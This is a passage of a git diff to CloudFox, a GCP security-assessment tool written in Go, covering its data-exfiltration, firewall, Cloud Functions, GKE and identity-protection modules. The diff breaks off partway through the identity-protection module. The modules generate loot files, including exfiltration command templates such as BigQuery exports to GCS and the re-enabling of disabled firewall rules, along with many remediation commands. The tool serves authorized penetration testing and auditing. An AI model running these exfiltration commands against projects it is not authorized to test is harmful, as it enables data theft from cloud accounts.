GCS or queried directly", + Destination: "GCS bucket or external table", + RiskLevel: "MEDIUM", + RiskReasons: []string{"BigQuery may contain sensitive data", "Export destination may be accessible"}, + ExploitCommand: fmt.Sprintf( + "# List BigQuery datasets\n"+ + "bq ls --project_id=%s\n"+ + "# Export table to GCS\n"+ + "bq extract --destination_format=CSV 'dataset.table' gs://bucket/export.csv", + projectID), + }, + { + PathType: "pubsub_subscription", + ResourceName: "*", + ProjectID: projectID, + Description: "Pub/Sub push subscriptions can send data to external endpoints", + Destination: "External HTTP endpoint", + RiskLevel: "HIGH", + RiskReasons: []string{"Push subscriptions send data to configured endpoints", "Endpoint may be attacker-controlled"}, + ExploitCommand: fmt.Sprintf( + "# List Pub/Sub topics and subscriptions\n"+ + "gcloud pubsub topics list --project=%s\n"+ + "gcloud pubsub subscriptions list --project=%s", + projectID, projectID), + }, + { + PathType: "cloud_functions", + ResourceName: "*", + ProjectID: projectID, + Description: "Cloud Functions can be used to exfiltrate data via HTTP", + Destination: "External HTTP endpoint", + RiskLevel: "HIGH", + RiskReasons: []string{"Functions can make outbound HTTP requests", "Can access internal resources and exfiltrate data"}, + ExploitCommand: fmt.Sprintf( + "# List Cloud Functions\n"+ + "gcloud functions list --project=%s", + projectID), + }, + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, vectors...) + for _, v := range vectors { + m.addExfiltrationPathToLoot(v) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DataExfiltrationModule) initializeLootFiles() { + m.LootMap["exfil-critical"] = &internal.LootFile{ + Name: "exfil-critical", + Contents: "# Critical Data Exfiltration Paths\n# Generated by CloudFox\n# These require immediate attention!\n\n", + } + m.LootMap["exfil-public-resources"] = &internal.LootFile{ + Name: "exfil-public-resources", + Contents: "# Public Resources (Data Exfiltration Risk)\n# Generated by CloudFox\n\n", + } + m.LootMap["exfil-commands"] = &internal.LootFile{ + Name: "exfil-commands", + Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + m.LootMap["exfil-high-risk"] = &internal.LootFile{ + Name: "exfil-high-risk", + Contents: "# High-Risk Exfiltration Resources\n# Generated by CloudFox\n\n", + } +} + +func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath) { + // Critical paths + if path.RiskLevel == "CRITICAL" { + m.LootMap["exfil-critical"].Contents += fmt.Sprintf( + "## %s: %s\n"+ + "Project: %s\n"+ + "Description: %s\n"+ + "Destination: %s\n"+ + "Risk Reasons:\n", + path.PathType, + path.ResourceName, + path.ProjectID, + path.Description, + path.Destination, + ) + for _, reason := range path.RiskReasons { + m.LootMap["exfil-critical"].Contents += fmt.Sprintf(" - %s\n", reason) + } + m.LootMap["exfil-critical"].Contents += fmt.Sprintf("\nExploit:\n%s\n\n", path.ExploitCommand) + } + + // High-risk paths + if path.RiskLevel == "HIGH" { + m.LootMap["exfil-high-risk"].Contents += fmt.Sprintf( + "## %s: %s\n"+ + "Project: %s\n"+ + "Description: %s\n\n", + path.PathType, + path.ResourceName, + path.ProjectID, + path.Description, + ) + } + + // All commands + if path.ExploitCommand != "" { + m.LootMap["exfil-commands"].Contents += fmt.Sprintf( + "# %s: %s (%s)\n%s\n\n", + path.PathType, + path.ResourceName, + path.RiskLevel, + path.ExploitCommand, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort paths by risk level + sort.Slice(m.ExfiltrationPaths, func(i, j int) bool { + riskOrder := map[string]int{"CRITICAL": 4, "HIGH": 3, "MEDIUM": 2, "LOW": 1} + return riskOrder[m.ExfiltrationPaths[i].RiskLevel] > riskOrder[m.ExfiltrationPaths[j].RiskLevel] + }) + + // Exfiltration paths table + pathsHeader := []string{ + "Type", + "Resource", + "Project", + "Destination", + "Risk", + } + + var pathsBody [][]string + for _, p := range m.ExfiltrationPaths { + pathsBody = append(pathsBody, []string{ + p.PathType, + truncateString(p.ResourceName, 30), + p.ProjectID, + truncateString(p.Destination, 30), + p.RiskLevel, + }) + } + + // Public exports table + exportsHeader := []string{ + "Type", + "Resource", + "Project", + "Access Level", + "Data Type", + "Risk", + } + + var exportsBody [][]string + for _, e := range m.PublicExports { + exportsBody = append(exportsBody, []string{ + e.ResourceType, + e.ResourceName, + e.ProjectID, + e.AccessLevel, + e.DataType, + e.RiskLevel, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(pathsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "exfil-paths", + Header: pathsHeader, + Body: pathsBody, + }) + } + + if len(exportsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "exfil-public-exports", + Header: exportsHeader, + Body: exportsBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public export(s)", len(exportsBody)), GCP_DATAEXFILTRATION_MODULE_NAME) + } + + output := DataExfiltrationOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index b0187576..e74c7f21 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -217,6 +217,26 @@ func (m *FirewallModule) initializeLootFiles() { Name: "firewall-exploitation", Contents: "# Firewall Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } + m.LootMap["firewall-network-tags"] = &internal.LootFile{ + Name: "firewall-network-tags", + Contents: "# Firewall Rules by Network Tag\n# Generated by CloudFox\n# Network tags control which instances receive firewall rules\n\n", + } + m.LootMap["firewall-service-account-rules"] = &internal.LootFile{ + Name: "firewall-service-account-rules", + Contents: "# Firewall Rules by Service Account\n# Generated by CloudFox\n# These rules apply based on instance service account\n\n", + } + m.LootMap["firewall-all-instances-rules"] = &internal.LootFile{ + Name: "firewall-all-instances-rules", + Contents: "# Firewall Rules Applying to ALL Instances\n# Generated by CloudFox\n# These rules have no target tags or SAs - apply to everything!\n\n", + } + m.LootMap["firewall-disabled-rules"] = &internal.LootFile{ + Name: "firewall-disabled-rules", + Contents: "# DISABLED Firewall Rules\n# Generated by CloudFox\n# These rules are inactive but may be enabled later\n\n", + } + m.LootMap["firewall-security-recommendations"] = &internal.LootFile{ + Name: "firewall-security-recommendations", + Contents: "# Firewall Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", + } } func (m *FirewallModule) addNetworkToLoot(network NetworkService.VPCInfo) { @@ -354,6 +374,133 @@ func (m *FirewallModule) addFirewallRuleToLoot(rule NetworkService.FirewallRuleI } } } + + // Rules with network tags + if len(rule.TargetTags) > 0 { + m.LootMap["firewall-network-tags"].Contents += fmt.Sprintf( + "# RULE: %s (Project: %s, Network: %s)\n"+ + "# Direction: %s, Priority: %d\n"+ + "# Target Tags: %s\n"+ + "# Allowed: %s\n"+ + "# Find instances with these tags:\n"+ + "gcloud compute instances list --filter=\"tags.items=%s\" --project=%s\n\n", + rule.Name, rule.ProjectID, rule.Network, + rule.Direction, rule.Priority, + strings.Join(rule.TargetTags, ", "), + formatProtocols(rule.AllowedProtocols), + rule.TargetTags[0], rule.ProjectID, + ) + } + + // Rules with service accounts + if len(rule.TargetSAs) > 0 { + m.LootMap["firewall-service-account-rules"].Contents += fmt.Sprintf( + "# RULE: %s (Project: %s, Network: %s)\n"+ + "# Direction: %s, Priority: %d\n"+ + "# Target Service Accounts:\n", + rule.Name, rule.ProjectID, rule.Network, + rule.Direction, rule.Priority, + ) + for _, sa := range rule.TargetSAs { + m.LootMap["firewall-service-account-rules"].Contents += fmt.Sprintf("# - %s\n", sa) + } + m.LootMap["firewall-service-account-rules"].Contents += fmt.Sprintf( + "# Allowed: %s\n"+ + "# Find instances with these SAs:\n"+ + "gcloud compute instances list --filter=\"serviceAccounts.email=%s\" --project=%s\n\n", + formatProtocols(rule.AllowedProtocols), + rule.TargetSAs[0], rule.ProjectID, + ) + } + + // Rules applying to all instances (no tags or SAs) + if len(rule.TargetTags) == 0 && len(rule.TargetSAs) == 0 { + m.LootMap["firewall-all-instances-rules"].Contents += fmt.Sprintf( + "# RULE: %s (Project: %s, Network: %s)\n"+ + "# Direction: %s, Priority: %d\n"+ + "# Source Ranges: %s\n"+ + "# Allowed: %s\n"+ + "# WARNING: Applies to ALL instances in the network!\n\n", + rule.Name, rule.ProjectID, rule.Network, + rule.Direction, rule.Priority, + strings.Join(rule.SourceRanges, ", "), + formatProtocols(rule.AllowedProtocols), + ) + } + + // Disabled rules + if rule.Disabled { + m.LootMap["firewall-disabled-rules"].Contents += fmt.Sprintf( + "# RULE: %s (Project: %s, Network: %s)\n"+ + "# Direction: %s, Priority: %d\n"+ + "# Source Ranges: %s\n"+ + "# Allowed: %s\n"+ + "# Enable with:\n"+ + "gcloud compute firewall-rules update %s --no-disabled --project=%s\n\n", + rule.Name, rule.ProjectID, rule.Network, + rule.Direction, rule.Priority, + strings.Join(rule.SourceRanges, ", "), + formatProtocols(rule.AllowedProtocols), + rule.Name, rule.ProjectID, + ) + } + + // Security recommendations + m.addFirewallSecurityRecommendations(rule) +} + +// addFirewallSecurityRecommendations adds remediation commands for firewall security issues +func (m *FirewallModule) addFirewallSecurityRecommendations(rule NetworkService.FirewallRuleInfo) { + hasRecommendations := false + recommendations := fmt.Sprintf( + "# RULE: %s (Project: %s, Network: %s)\n", + rule.Name, rule.ProjectID, rule.Network, + ) + + // Public ingress + if rule.IsPublicIngress && rule.Direction == "INGRESS" { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Allows ingress from 0.0.0.0/0 (internet)\n"+ + "# Restrict source ranges:\n"+ + "gcloud compute firewall-rules update %s \\\n"+ + " --source-ranges=\"10.0.0.0/8\" \\\n"+ + " --project=%s\n\n", + rule.Name, rule.ProjectID, + ) + } + + // All ports allowed + for proto, ports := range rule.AllowedProtocols { + if len(ports) == 0 && (proto == "all" || proto == "tcp" || proto == "udp") { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Allows all %s ports\n"+ + "# Restrict to specific ports:\n"+ + "gcloud compute firewall-rules update %s \\\n"+ + " --allow=\"tcp:80,tcp:443\" \\\n"+ + " --project=%s\n\n", + proto, rule.Name, rule.ProjectID, + ) + } + } + + // No target restriction + if len(rule.TargetTags) == 0 && len(rule.TargetSAs) == 0 && rule.IsPublicIngress { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Applies to ALL instances with public ingress\n"+ + "# Add target tags or SAs to limit scope:\n"+ + "gcloud compute firewall-rules update %s \\\n"+ + " --target-tags=\"web-server\" \\\n"+ + " --project=%s\n\n", + rule.Name, rule.ProjectID, + ) + } + + if hasRecommendations { + m.LootMap["firewall-security-recommendations"].Contents += recommendations + "\n" + } } // ------------------------------ diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index ceefc550..143cefc8 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -185,6 +185,27 @@ func (m *FunctionsModule) initializeLootFiles() { Name: "functions-secrets", Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", } + // New enhancement loot files + m.LootMap["functions-internal-only"] = &internal.LootFile{ + Name: "functions-internal-only", + Contents: "# GCP Cloud Functions with Internal-Only Ingress\n# These functions are more secure - only accessible from VPC\n# Generated by CloudFox\n\n", + } + m.LootMap["functions-vpc-connected"] = &internal.LootFile{ + Name: "functions-vpc-connected", + Contents: "# GCP Cloud Functions with VPC Connectors\n# These functions can access internal VPC resources\n# Generated by CloudFox\n\n", + } + m.LootMap["functions-cold-start-risk"] = &internal.LootFile{ + Name: "functions-cold-start-risk", + Contents: "# GCP Cloud Functions Cold Start Risk Analysis\n# Functions with minInstances=0 may have cold starts\n# Generated by CloudFox\n\n", + } + m.LootMap["functions-high-concurrency"] = &internal.LootFile{ + Name: "functions-high-concurrency", + Contents: "# GCP Cloud Functions with High Concurrency Limits\n# High concurrency may indicate high-value targets\n# Generated by CloudFox\n\n", + } + m.LootMap["functions-security-recommendations"] = &internal.LootFile{ + Name: "functions-security-recommendations", + Contents: "# GCP Cloud Functions Security Recommendations\n# Generated by CloudFox\n\n", + } } func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { @@ -307,6 +328,116 @@ func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { } m.LootMap["functions-secrets"].Contents += "\n" } + + // Enhancement: Internal-only functions + if fn.IngressSettings == "ALLOW_INTERNAL_ONLY" || fn.IngressSettings == "INTERNAL_ONLY" { + m.LootMap["functions-internal-only"].Contents += fmt.Sprintf( + "# Function: %s (Project: %s, Region: %s)\n"+ + "# Ingress: %s - Only accessible from VPC\n"+ + "# VPC Connector: %s\n\n", + fn.Name, fn.ProjectID, fn.Region, + fn.IngressSettings, + fn.VPCConnector, + ) + } + + // Enhancement: VPC-connected functions + if fn.VPCConnector != "" { + m.LootMap["functions-vpc-connected"].Contents += fmt.Sprintf( + "# Function: %s (Project: %s, Region: %s)\n"+ + "# VPC Connector: %s\n"+ + "# Egress: %s\n"+ + "# Lateral Movement Potential: This function can access VPC resources\n\n", + fn.Name, fn.ProjectID, fn.Region, + fn.VPCConnector, + fn.VPCEgressSettings, + ) + } + + // Enhancement: Cold start risk + if fn.MinInstanceCount == 0 { + m.LootMap["functions-cold-start-risk"].Contents += fmt.Sprintf( + "# Function: %s (Project: %s, Region: %s)\n"+ + "# Min Instances: %d (cold starts expected)\n"+ + "# Max Instances: %d\n"+ + "# Memory: %d MB, Timeout: %ds\n"+ + "# Remediation: Set min instances to reduce cold starts\n"+ + "gcloud functions deploy %s --region=%s --min-instances=1 --gen2\n\n", + fn.Name, fn.ProjectID, fn.Region, + fn.MinInstanceCount, + fn.MaxInstanceCount, + fn.AvailableMemoryMB, fn.TimeoutSeconds, + fn.Name, fn.Region, + ) + } + + // Enhancement: High concurrency functions + if fn.MaxInstanceCount > 100 || fn.MaxInstanceRequestConcurrency > 80 { + m.LootMap["functions-high-concurrency"].Contents += fmt.Sprintf( + "# Function: %s (Project: %s, Region: %s)\n"+ + "# Max Instances: %d\n"+ + "# Max Concurrent Requests/Instance: %d\n"+ + "# Effective Concurrency: ~%d requests\n"+ + "# This is a high-traffic function - potential high-value target\n\n", + fn.Name, fn.ProjectID, fn.Region, + fn.MaxInstanceCount, + fn.MaxInstanceRequestConcurrency, + fn.MaxInstanceCount*fn.MaxInstanceRequestConcurrency, + ) + } + + // Add security recommendations + m.addFunctionSecurityRecommendations(fn) +} + +// addFunctionSecurityRecommendations generates security recommendations for a function +func (m *FunctionsModule) addFunctionSecurityRecommendations(fn FunctionsService.FunctionInfo) { + hasRecommendations := false + recommendations := fmt.Sprintf("# FUNCTION: %s (Project: %s, Region: %s)\n", fn.Name, fn.ProjectID, fn.Region) + + // Public access + if fn.IsPublic { + hasRecommendations = true + recommendations += "# [CRITICAL] Function is publicly accessible\n" + recommendations += fmt.Sprintf("# Remediation: Remove public access\n") + recommendations += fmt.Sprintf("gcloud functions remove-iam-policy-binding %s --region=%s --member=allUsers --role=roles/cloudfunctions.invoker --gen2\n", fn.Name, fn.Region) + } + + // All traffic ingress + if fn.IngressSettings == "ALLOW_ALL" || fn.IngressSettings == "ALL_TRAFFIC" { + hasRecommendations = true + recommendations += "# [MEDIUM] Function allows all ingress traffic\n" + recommendations += "# Remediation: Restrict to internal or GCLB\n" + recommendations += fmt.Sprintf("gcloud functions deploy %s --region=%s --ingress-settings=internal-only --gen2\n", fn.Name, fn.Region) + } + + // Default service account + if strings.Contains(fn.ServiceAccount, "-compute@developer.gserviceaccount.com") || + strings.Contains(fn.ServiceAccount, "@appspot.gserviceaccount.com") { + hasRecommendations = true + recommendations += "# [HIGH] Uses default service account with potentially excessive permissions\n" + recommendations += "# Remediation: Create a dedicated service account with minimal permissions\n" + } + + // No min instances (cold start) + if fn.MinInstanceCount == 0 { + hasRecommendations = true + recommendations += "# [LOW] No minimum instances configured - cold starts expected\n" + recommendations += fmt.Sprintf("gcloud functions deploy %s --region=%s --min-instances=1 --gen2\n", fn.Name, fn.Region) + } + + // VPC connector without egress restriction + if fn.VPCConnector != "" && fn.VPCEgressSettings != "PRIVATE_RANGES_ONLY" { + hasRecommendations = true + recommendations += "# [MEDIUM] VPC connector without private-only egress\n" + recommendations += "# The function can reach both VPC and public internet\n" + recommendations += fmt.Sprintf("gcloud functions deploy %s --region=%s --vpc-connector=%s --egress-settings=private-ranges-only --gen2\n", + fn.Name, fn.Region, fn.VPCConnector) + } + + if hasRecommendations { + m.LootMap["functions-security-recommendations"].Contents += recommendations + "\n" + } } func (m *FunctionsModule) addSecurityAnalysisToLoot(analysis FunctionsService.FunctionSecurityAnalysis, fn FunctionsService.FunctionInfo) { diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index 12f6d41f..8848cdc3 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -26,6 +26,10 @@ Features: - Shows workload identity configuration - Detects common misconfigurations (legacy ABAC, basic auth, no network policy) - Enumerates node pools with service accounts and OAuth scopes +- Shows Binary Authorization status +- Shows GKE Autopilot vs Standard mode +- Shows Config Connector and Istio/ASM status +- Shows maintenance window and exclusions - Generates kubectl and gcloud commands for further analysis Security Columns: @@ -34,13 +38,17 @@ Security Columns: - NetworkPolicy: Kubernetes network policy controller enabled - WorkloadIdentity: GKE Workload Identity configured - ShieldedNodes: Shielded GKE nodes enabled +- BinAuth: Binary Authorization enabled +- Autopilot: GKE Autopilot mode (vs Standard) - Issues: Detected security misconfigurations Attack Surface: - Public API servers are accessible from the internet - Clusters without Workload Identity use node service accounts - Default service accounts may have excessive permissions -- Legacy ABAC allows broader access than RBAC`, +- Legacy ABAC allows broader access than RBAC +- Autopilot clusters have reduced attack surface +- Binary Authorization prevents untrusted container images`, Run: runGCPGKECommand, } @@ -194,6 +202,18 @@ func (m *GKEModule) initializeLootFiles() { Name: "gke-risky-nodepools", Contents: "# GKE Risky Node Pools\n# Generated by CloudFox\n# Node pools with excessive OAuth scopes or default SA\n\n", } + m.LootMap["gke-security-recommendations"] = &internal.LootFile{ + Name: "gke-security-recommendations", + Contents: "# GKE Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", + } + m.LootMap["gke-no-binary-auth"] = &internal.LootFile{ + Name: "gke-no-binary-auth", + Contents: "# GKE Clusters WITHOUT Binary Authorization\n# Generated by CloudFox\n# These clusters allow untrusted container images\n\n", + } + m.LootMap["gke-autopilot-clusters"] = &internal.LootFile{ + Name: "gke-autopilot-clusters", + Contents: "# GKE Autopilot Clusters\n# Generated by CloudFox\n# Autopilot clusters have enhanced security by default\n\n", + } } func (m *GKEModule) addClusterToLoot(cluster GKEService.ClusterInfo) { @@ -258,6 +278,134 @@ func (m *GKEModule) addClusterToLoot(cluster GKEService.ClusterInfo) { } m.LootMap["gke-security-issues"].Contents += "\n" } + + // Binary Authorization missing + if !cluster.BinaryAuthorization { + m.LootMap["gke-no-binary-auth"].Contents += fmt.Sprintf( + "# CLUSTER: %s (Project: %s)\n"+ + "# Location: %s\n"+ + "# Binary Authorization: Disabled\n"+ + "# Enable with:\n"+ + "gcloud container clusters update %s \\\n"+ + " --location=%s \\\n"+ + " --binauthz-evaluation-mode=PROJECT_SINGLETON_POLICY_ENFORCE \\\n"+ + " --project=%s\n\n", + cluster.Name, cluster.ProjectID, + cluster.Location, + cluster.Name, cluster.Location, cluster.ProjectID, + ) + } + + // Autopilot clusters + if cluster.Autopilot { + m.LootMap["gke-autopilot-clusters"].Contents += fmt.Sprintf( + "# CLUSTER: %s (Project: %s)\n"+ + "# Location: %s\n"+ + "# Mode: Autopilot\n"+ + "# Security Benefits:\n"+ + "# - Hardened node configuration\n"+ + "# - Workload Identity enabled by default\n"+ + "# - Shielded nodes by default\n"+ + "# - Container-Optimized OS only\n"+ + "# - No SSH access to nodes\n\n", + cluster.Name, cluster.ProjectID, cluster.Location, + ) + } + + // Security recommendations + m.addClusterSecurityRecommendations(cluster) +} + +// addClusterSecurityRecommendations adds remediation commands for GKE security issues +func (m *GKEModule) addClusterSecurityRecommendations(cluster GKEService.ClusterInfo) { + hasRecommendations := false + recommendations := fmt.Sprintf( + "# CLUSTER: %s (Project: %s, Location: %s)\n", + cluster.Name, cluster.ProjectID, cluster.Location, + ) + + // No Workload Identity + if cluster.WorkloadIdentity == "" { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Workload Identity not configured\n"+ + "gcloud container clusters update %s \\\n"+ + " --location=%s \\\n"+ + " --workload-pool=%s.svc.id.goog \\\n"+ + " --project=%s\n\n", + cluster.Name, cluster.Location, cluster.ProjectID, cluster.ProjectID, + ) + } + + // No network policy + if !cluster.NetworkPolicy { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Network policy not enabled\n"+ + "gcloud container clusters update %s \\\n"+ + " --location=%s \\\n"+ + " --enable-network-policy \\\n"+ + " --project=%s\n\n", + cluster.Name, cluster.Location, cluster.ProjectID, + ) + } + + // No Binary Authorization + if !cluster.BinaryAuthorization { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Binary Authorization not enabled\n"+ + "gcloud container clusters update %s \\\n"+ + " --location=%s \\\n"+ + " --binauthz-evaluation-mode=PROJECT_SINGLETON_POLICY_ENFORCE \\\n"+ + " --project=%s\n\n", + cluster.Name, cluster.Location, cluster.ProjectID, + ) + } + + // No Shielded Nodes + if !cluster.ShieldedNodes { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Shielded nodes not enabled\n"+ + "gcloud container clusters update %s \\\n"+ + " --location=%s \\\n"+ + " --enable-shielded-nodes \\\n"+ + " --project=%s\n\n", + cluster.Name, cluster.Location, cluster.ProjectID, + ) + } + + // Legacy ABAC enabled + if cluster.LegacyABAC { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Legacy ABAC enabled (HIGH RISK)\n"+ + "gcloud container clusters update %s \\\n"+ + " --location=%s \\\n"+ + " --no-enable-legacy-authorization \\\n"+ + " --project=%s\n\n", + cluster.Name, cluster.Location, cluster.ProjectID, + ) + } + + // Public endpoint without master authorized networks + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + hasRecommendations = true + recommendations += fmt.Sprintf( + "# Issue: Public endpoint without master authorized networks\n"+ + "gcloud container clusters update %s \\\n"+ + " --location=%s \\\n"+ + " --enable-master-authorized-networks \\\n"+ + " --master-authorized-networks= \\\n"+ + " --project=%s\n\n", + cluster.Name, cluster.Location, cluster.ProjectID, + ) + } + + if hasRecommendations { + m.LootMap["gke-security-recommendations"].Contents += recommendations + "\n" + } } func (m *GKEModule) addSecurityAnalysisToLoot(analysis GKEService.ClusterSecurityAnalysis) { @@ -338,18 +486,20 @@ func (m *GKEModule) addNodePoolSecurityToLoot(np GKEService.NodePoolInfo) { // Output Generation // ------------------------------ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main clusters table + // Main clusters table with enhanced columns header := []string{ "Project ID", "Name", "Location", "Status", "Version", + "Mode", "Private", "MasterAuth", - "NetworkPolicy", + "NetPolicy", "WorkloadID", - "ShieldedNodes", + "Shielded", + "BinAuth", "Issues", } @@ -368,17 +518,25 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { issueDisplay = fmt.Sprintf("%d issues", issueCount) } + // Cluster mode + clusterMode := "Standard" + if cluster.Autopilot { + clusterMode = "Autopilot" + } + body = append(body, []string{ cluster.ProjectID, cluster.Name, cluster.Location, cluster.Status, cluster.CurrentMasterVersion, + clusterMode, boolToYesNo(cluster.PrivateCluster), boolToYesNo(cluster.MasterAuthorizedOnly), boolToYesNo(cluster.NetworkPolicy), workloadIDStatus, boolToYesNo(cluster.ShieldedNodes), + boolToYesNo(cluster.BinaryAuthorization), issueDisplay, }) } @@ -511,6 +669,50 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { } } + // Cluster configuration table (addons and maintenance) + configHeader := []string{ + "Cluster", + "Project ID", + "Mode", + "Release Channel", + "ConfigConnector", + "Istio/ASM", + "Node AutoProv", + "Maintenance", + "Exclusions", + } + + var configBody [][]string + for _, cluster := range m.Clusters { + clusterMode := "Standard" + if cluster.Autopilot { + clusterMode = "Autopilot" + } + releaseChannel := cluster.ReleaseChannel + if releaseChannel == "" || releaseChannel == "UNSPECIFIED" { + releaseChannel = "None" + } + maintenanceWindow := cluster.MaintenanceWindow + if maintenanceWindow == "" { + maintenanceWindow = "Not set" + } + exclusions := "-" + if len(cluster.MaintenanceExclusions) > 0 { + exclusions = fmt.Sprintf("%d exclusions", len(cluster.MaintenanceExclusions)) + } + configBody = append(configBody, []string{ + cluster.Name, + cluster.ProjectID, + clusterMode, + releaseChannel, + boolToYesNo(cluster.ConfigConnector), + boolToYesNo(cluster.IstioEnabled), + boolToYesNo(cluster.NodeAutoProvisioning), + maintenanceWindow, + exclusions, + }) + } + // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -560,6 +762,13 @@ func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } + // Always add cluster config table + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-cluster-config", + Header: configHeader, + Body: configBody, + }) + output := GKEOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/identityprotection.go b/gcp/commands/identityprotection.go new file mode 100644 index 00000000..1c62db68 --- /dev/null +++ b/gcp/commands/identityprotection.go @@ -0,0 +1,926 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iam/v1" +) + +// Module name constant +const GCP_IDENTITYPROTECTION_MODULE_NAME string = "identity-protection" + +var GCPIdentityProtectionCommand = &cobra.Command{ + Use: GCP_IDENTITYPROTECTION_MODULE_NAME, + Aliases: []string{"identity", "risky-identities", "iam-risk"}, + Short: "Risk-based identity analysis and suspicious activity detection", + Long: `Analyze IAM identities for security risks, unused permissions, and policy recommendations. + +Features: +- Identifies risky IAM bindings (overly permissive roles) +- Detects unused permissions and over-provisioned identities +- Analyzes service account key age and rotation status +- Identifies external identities with access +- Detects domain-wide delegation configurations +- Provides policy recommendations for least privilege +- Maps identity attack surface + +Risk Categories: +- CRITICAL: Owner/Editor roles, domain-wide delegation, allUsers access +- HIGH: Primitive roles, external identity access, old service account keys +- MEDIUM: Broad permissions, unused high-privilege roles +- LOW: Minor policy improvements recommended + +Requires appropriate IAM permissions: +- roles/iam.securityReviewer +- roles/resourcemanager.organizationViewer`, + Run: runGCPIdentityProtectionCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type RiskyBinding struct { + Principal string + Role string + Resource string + ResourceType string + ProjectID string + RiskLevel string + RiskReason string + Recommendation string + BindingType string // user, serviceAccount, group, domain, allUsers, allAuthenticatedUsers +} + +type UnusedPermission struct { + Principal string + Role string + Resource string + ProjectID string + LastUsed string + DaysSinceUse int + Recommendation string + PermissionCount int +} + +type ServiceAccountRisk struct { + Email string + ProjectID string + DisplayName string + KeyCount int + OldestKeyAge int // days + HasUserManagedKey bool + DomainWideDelegation bool + RiskLevel string + RiskReasons []string + Recommendations []string +} + +type ExternalIdentity struct { + Principal string + IdentityType string // external-user, external-sa, external-domain + Domain string + Roles []string + Resources []string + ProjectID string + RiskLevel string + Details string +} + +type IdentityRisk struct { + RiskType string + Severity string + AffectedCount int + Description string + Mitigation string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type IdentityProtectionModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + RiskyBindings []RiskyBinding + UnusedPermissions []UnusedPermission + ServiceAccountRisks []ServiceAccountRisk + ExternalIdentities []ExternalIdentity + IdentityRisks []IdentityRisk + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + projectDomains map[string]string // project -> org domain + allUsersCount int + allAuthCount int + ownerCount int + editorCount int + externalCount int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type IdentityProtectionOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IdentityProtectionOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IdentityProtectionOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPIdentityProtectionCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_IDENTITYPROTECTION_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &IdentityProtectionModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RiskyBindings: []RiskyBinding{}, + UnusedPermissions: []UnusedPermission{}, + ServiceAccountRisks: []ServiceAccountRisk{}, + ExternalIdentities: []ExternalIdentity{}, + IdentityRisks: []IdentityRisk{}, + LootMap: make(map[string]*internal.LootFile), + projectDomains: make(map[string]string), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + 